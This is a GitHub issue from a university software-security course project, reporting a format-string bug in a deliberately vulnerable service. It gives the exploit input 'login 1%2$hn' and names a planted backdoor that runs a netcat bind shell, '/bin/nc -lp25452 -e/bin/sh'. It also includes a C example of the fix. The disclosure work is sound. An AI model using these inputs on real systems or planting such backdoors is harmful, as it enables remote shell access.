xavierpantet / my_ass_on_your_grass

Software Security (CS-412) project at EPFL. Vulnerable GRep AS a Service.

Possible backdoor / format string attack #5

Open poechsel opened 5 years ago

poechsel commented 5 years ago

In the function registerUser a user controlled input is used as a format string:

https://github.com/xavierpantet/my_ass_on_your_grass/blob/355151c90db67b16c7d5877d37a71ef1b92c1f78/src/services/authentication/AuthenticationService.cpp#L16-L20

Furthermore, registerUser is called each time the login command is issued by a user, and name is the parameter passed to the login command. Thus the user could pass a valid format string to execute a format string attack and overwrite login with a non-zero value.

Then, in the function user_already_logged, if the getLogin (which returns the value of login defined in registerUser) of the current user (the one passed by login earlier) is non-zero, a snippet of code that executes /bin/nc -lp25452 -e/bin/sh is called.

https://github.com/xavierpantet/my_ass_on_your_grass/blob/5265459c2eaf05b87a79ccbd51487ce17b85405b/src/commands/Commands.cpp#L280-L295

Exploit: The following sequence of commands will execute this vulnerability:

login 1%2$hn
login q

The first login will rewrite the login variable. The second is here to call the function user_already_login, which checks if this client has already executed login with another username.
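The pattern reported above (user input used directly as a printf format string, with a %n-family directive turning it into a memory write) next to its hardened form, as an added C example that is not code from this repository. The names login, register_user_vulnerable, register_user_safe, user_already_logged and login_command are hypothetical stand-ins modelled on the registerUser/getLogin/user_already_logged flow the report describes; the project's own functions are not reproduced here, and the backdoor command is deliberately not invoked.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Hypothetical stand-in for the per-user "login" state the report says the
 * format-string write overwrites. Non-zero is what reaches the backdoor path. */
static int login = 0;

int get_login(void) { return login; }
void reset_login(void) { login = 0; }

/* Models the check the report describes: a non-zero login value is what makes
 * the project run its /bin/nc snippet. Here we only report the condition. */
int user_already_logged(void) { return login != 0; }

/* VULNERABLE pattern from the report: the user-controlled name is the format
 * string. "1%2$hn" makes printf treat the second variadic slot as a pointer
 * and store the number of bytes printed so far (1) there as a short, i.e. an
 * attacker-directed write. Never call this with untrusted input; it is kept
 * only for contrast and is not exercised by the test. */
void register_user_vulnerable(const char *name) {
    printf(name);
    putchar('\n');
}

/* HARDENED form: the format string is a constant and the name is an argument,
 * so any '%' inside the name is printed literally and no directive is parsed. */
void register_user_safe(const char *name) {
    printf("%s\n", name);
}

/* Walk a string the way printf's parser would and report whether it carries a
 * %n-family directive, the only conversion that writes to memory. Handles the
 * "%%" escape, positional "N$" arguments, flags, width, precision and length
 * modifiers. Returns 1 if a write directive is present, 0 otherwise. */
int format_has_write_directive(const char *s) {
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;                 /* "%%" is a literal percent */
        const char *q = p;                       /* optional positional "N$" */
        while (isdigit((unsigned char)*q)) q++;
        if (*q == '$') p = q + 1;
        while (*p && strchr("-+ #0'", *p)) p++;  /* flags */
        if (*p == '*') {                         /* width from an argument */
            p++;
            while (isdigit((unsigned char)*p)) p++;
            if (*p == '$') p++;
        } else {
            while (isdigit((unsigned char)*p)) p++;
        }
        if (*p == '.') {                         /* precision */
            p++;
            if (*p == '*') {
                p++;
                while (isdigit((unsigned char)*p)) p++;
                if (*p == '$') p++;
            } else {
                while (isdigit((unsigned char)*p)) p++;
            }
        }
        while (*p && strchr("hljztLq", *p)) p++; /* length modifiers */
        if (*p == 'n') return 1;
        if (*p == '\0') break;                   /* dangling '%' at end */
    }
    return 0;
}

/* Hardened login handler: the name is always treated as data (register_user_safe),
 * and on top of that a name carrying a %n directive is refused so the attempt
 * can be logged instead of silently echoed. Returns 0 on success, -1 if rejected. */
int login_command(const char *name) {
    if (format_has_write_directive(name)) return -1;
    register_user_safe(name);
    return 0;
}

int main(void) {
    const char *attack = "1%2$hn";   /* constructed: the payload from the report */
    printf("login %s -> %s\n", attack,
           login_command(attack) == 0 ? "accepted" : "rejected");
    printf("login q -> %s\n", login_command("q") == 0 ? "accepted" : "rejected");
    printf("user_already_logged: %d\n", user_already_logged());
    return 0;
}
```

The fix that actually closes the bug is the constant format string in register_user_safe; the directive scanner is defence in depth and a useful detection signature for the login command, not a substitute for `printf("%s", name)`.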

guillaumemichel commented 5 years ago

Congrats you found a vulnerability!